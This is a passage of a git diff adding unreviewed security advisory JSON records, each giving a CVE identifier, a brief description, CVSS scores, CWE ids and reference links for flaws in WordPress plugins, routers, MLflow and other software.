overflow via the vpnUser or vpnPassword` parameters in the formFilter function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26732" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formFilter-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json b/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json new file mode 100644 index 0000000000000..18c24a6aeff59 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr2h-8f83-vhfr", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1047" + ], + "details": "The salavat counter Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'image_url' parameter in all versions up to, and including, 0.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1047" + }, + { + "type": "WEB", + "url": "https://downloads.wordpress.org/plugin/salavat-counter.zip" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/salavat-counter/tags/0.9.5/wp-table-options.php#L352" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/salavat-counter/trunk/wp-table-options.php#L352" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/salavat-counter" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6696b262-c6e5-4413-b7dc-894965daa5ac?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json b/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json new file mode 100644 index 0000000000000..8152661a9af00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prg6-5jr3-w97r", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2706" + ], + "details": "A flaw has been found in code-projects Patient Record Management System 1.0. This affects an unknown function of the file /fecalysis_not.php. This manipulation of the argument comp_id causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2706" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://github.com/1768161086/sql_cve" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346652" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346652" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754407" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json new file mode 100644 index 0000000000000..14e3738dff4bc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prpx-gw6q-vpv2", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-51915" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through <= 6.5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51915" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/litespeed-cache/vulnerability/wordpress-litespeed-cache-plugin-6-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json new file mode 100644 index 0000000000000..d06810af22929 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw6c-r98f-r37w", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67997" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Travelicious travelicious allows Object Injection.This issue affects Travelicious: from n/a through < 1.6.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67997" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/travelicious/vulnerability/wordpress-travelicious-theme-1-6-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json new file mode 100644 index 0000000000000..2c482be3f30ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px76-q5p2-wfgw", + "modified": "2026-02-20T18:31:28Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27057" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Filter Everything penci-filter-everything allows Stored XSS.This issue affects Penci Filter Everything: from n/a through <= 1.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27057" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-filter-everything/vulnerability/wordpress-penci-filter-everything-plugin-1-7-cross-site-scripting-xss-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json b/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json new file mode 100644 index 0000000000000..f413d75041d80 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxr8-26wq-vfvp/GHSA-pxr8-26wq-vfvp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxr8-26wq-vfvp", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-22268" + ], + "details": "Dell PowerProtect Data Manager, version(s) prior to 19.22, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to denial of service of a Dell Enterprise Support connection.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22268" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429778/dsa-2026-046-security-update-for-dell-powerprotect-data-manager-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T10:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json new file mode 100644 index 0000000000000..554cf7a287241 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxxq-rvgm-p9rp", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69308" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Nestbyte Core nestbyte-core allows Blind SQL Injection.This issue affects Nestbyte Core: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69308" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nestbyte-core/vulnerability/wordpress-nestbyte-core-plugin-1-2-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json new file mode 100644 index 0000000000000..7546a6fac5b53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2ch-643m-222m", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2333" + ], + "details": "Improper Neutralization of Special Elements used in a Command ('Command Injection') in Owl opds 2.2.0.4 allows Command Injection via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2333" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-2333" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json new file mode 100644 index 0000000000000..b9887ba3cc03e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2p9-fpj7-9fjp", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25458" + ], + "details": "Web Ofisi Firma Rehberi v1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through GET parameters. Attackers can send requests to with malicious payloads in the 'il', 'kat', or 'kelime' parameters to extract sensitive database information or perform time-based blind SQL injection attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25458" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47143" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-rehberi-sql-injection-via-firmalarhtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json new file mode 100644 index 0000000000000..07bc403cd3f0c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2q8-xrr4-fqjh", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27059" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Recipe penci-recipe allows DOM-Based XSS.This issue affects Penci Recipe: from n/a through <= 4.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27059" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-recipe/vulnerability/wordpress-penci-recipe-plugin-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json new file mode 100644 index 0000000000000..5627cb3ee33a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r4-399v-qv3c/GHSA-q2r4-399v-qv3c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r4-399v-qv3c", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2881" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_425FF8 of the file /boafrm/formFirewallAdv of the component Advanced Firewall Configuration Endpoint. Such manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2881" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/15" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347175" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754486" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json new file mode 100644 index 0000000000000..1c909829d0a77 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r8-vmq7-fpx2", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2033" + ], + "details": "MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of artifact file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26649.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2033" + }, + { + "type": "WEB", + "url": "https://github.com/mlflow/mlflow/pull/19260" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-105" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json new file mode 100644 index 0000000000000..8f640c2bf8511 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2wq-f7jq-885v", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25436" + ], + "details": "Sricam DeviceViewer 3.12.0.1 contains a password change security bypass vulnerability that allows authenticated users to change passwords without proper validation of the old password field. Attackers can inject a large payload into the old password parameter during the change password process to bypass validation and set an arbitrary new password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25436" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47476" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/sricam-deviceviewer-password-change-security-bypass" + }, + { + "type": "WEB", + "url": "http://www.sricam.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json b/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json new file mode 100644 index 0000000000000..39f49badfc06e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3f8-qfx4-gq35/GHSA-q3f8-qfx4-gq35.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3f8-qfx4-gq35", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2025-9062" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in MeCODE Informatics and Engineering Services Ltd. Envanty allows Parameter Injection.This issue affects Envanty: before 1.0.6.  \n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way. \nThe vulnerability was learned to be remediated through reporter information and testing.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9062" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0076" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T11:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json new file mode 100644 index 0000000000000..d7850968c5787 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q543-x74m-r8q9", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-22048" + ], + "details": "StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0.0.4 with Single Sign-on enabled and configured to use Microsoft Entra ID (formerly Azure AD) as an IdP are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an authenticated attacker with low privileges to delete configuration data or deny access to some resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22048" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/NTAP-20260217-0001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json b/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json new file mode 100644 index 0000000000000..786ce9912c29e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q54q-h92j-2fm3/GHSA-q54q-h92j-2fm3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q54q-h92j-2fm3", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-11725" + ], + "details": "The Aruba HiSpeed Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability checks on the multiple functions in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to modify plugin's configuration settings, enable or disable features, as well as enable/disable WordPress cron jobs or debug mode", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11725" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.1/aruba-hispeed-cache.php#L590" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.1/aruba-hispeed-cache.php#L618" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399636%40aruba-hispeed-cache&new=3399636%40aruba-hispeed-cache&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2830c958-13d1-4c69-8dde-7fc091db02eb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json new file mode 100644 index 0000000000000..4a931a9eea668 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q577-6r28-hw22", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69337" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in don-themes Wolmart Core wolmart-core allows Blind SQL Injection.This issue affects Wolmart Core: from n/a through <= 1.9.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69337" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wolmart-core/vulnerability/wordpress-wolmart-core-plugin-1-9-6-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json index 